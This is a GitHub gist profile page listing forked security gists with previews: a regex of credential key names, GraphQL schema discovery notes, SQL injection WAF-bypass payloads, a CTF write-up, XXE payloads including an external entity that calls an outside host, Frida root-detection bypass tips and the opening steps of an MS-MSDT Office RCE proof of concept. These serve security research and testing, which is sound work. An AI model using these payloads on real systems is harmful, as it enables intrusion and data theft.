Skip to content

Instantly share code, notes, and snippets.

View abdilahrf's full-sized avatar

Abdillah Hasny abdilahrf

203 followers · 68 following
View GitHub Profile
@abdilahrf
abdilahrf / Generic keys
Created December 26, 2023 04:50 — forked from h4x0r-dz/Generic keys
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
@abdilahrf
abdilahrf / BlindGraphQL.md
Created October 17, 2023 15:16 — forked from me0wday/BlindGraphQL.md
Blind Graphql Discovery to Altair Schema

Playing with GraphQL when introspection is disabled

Quick write up on extracting a GraphQL schema when introspection is disabled. Bits and pieces sourced from various sources. Successfully tested on an Apollo instance.

TLDR: Some GraphQL instances provide name autocomplete suggestions. Some peeps have written tools to automate the extraction process. (ref https://youtu.be/nPB8o0cSnvM).

1. Bruteforce schema without introspection

First step is using a tool called clairvoyance by @nikitastupin (https://github.com/nikitastupin/clairvoyance). I found the main repo to lack error handling and support for additional features such as proxy.

@abdilahrf
abdilahrf / gist:e7139b416854eac8609d1cf021504d73
Created October 15, 2023 13:10 — forked from tehseensagar/gist:d82931fa8427b3b8a8825714b5b113c4
SQLi WAF Bypass All Method
`-=[SQL injection Queries]=-
HOW TO SUCCESSFULLY INJECTING SQL INJECTION
[~] after id no. like id=1 +/*!and*/+1=0 [~]
EX: site.com?index.php?pageid=3 div+0 Union select 1,version(),3,4,5
+div+0
+div false
+Having+1=0+
@abdilahrf
abdilahrf / gist:65bb60222cae8c2158004dbde27857ae
Created June 1, 2017 07:36
Codegate 2014 CTF, web "120" write-up

Task

You are given a URI (all happens in the http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/ route) that leads to index.php, the same but ends with index.phps and is an alleged source code of the former, finally, index.php contains a link to auth.php

index.phps listing below

<?php
session_start();

$link = @mysql_connect('localhost', '', '');

@mysql_select_db('', $link);

@abdilahrf
abdilahrf / Axway SecureTransport 5.x Unauthenticated XXE
Created February 17, 2023 11:53 — forked from zeropwn/Axway SecureTransport 5.x Unauthenticated XXE
Axway SecureTransport 5.x Unauthenticated XML Injection / XXE
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
ATTENTION:
@abdilahrf
abdilahrf / -setup-windows-wsl-devenv.md
Created December 9, 2022 13:36 — forked from leodutra/-setup-windows-wsl-devenv.md
Install and Setup Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font

Setup Windows Subsystem 2 for Linux

Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font

To setup native Linux, see this gist

Preview

Requirements

@abdilahrf
abdilahrf / Enable WSL and Ubuntu 16.04 on Windows 10.md
Created December 8, 2022 13:51 — forked from xynova/Enable WSL and Ubuntu 16.04 on Windows 10.md
Enable WSL and Ubuntu 16.04 on Windows 10
@abdilahrf
abdilahrf / XXE_payloads
Created January 3, 2017 00:42 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@abdilahrf
abdilahrf / frida-tips.md
Created October 25, 2022 07:04 — forked from daniellimws/frida-tips.md
Frida tips

Frida Tips

The documentation is so limited. A compilation of things I found on StackOverflow and don't want to have to search it up again.

Bypass root check

setTimeout(function() { // avoid java.lang.ClassNotFoundException

  Java.perform(function() {

    // Root detection bypass example
@abdilahrf
abdilahrf / ms-msdt.MD
Created June 4, 2022 05:42 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.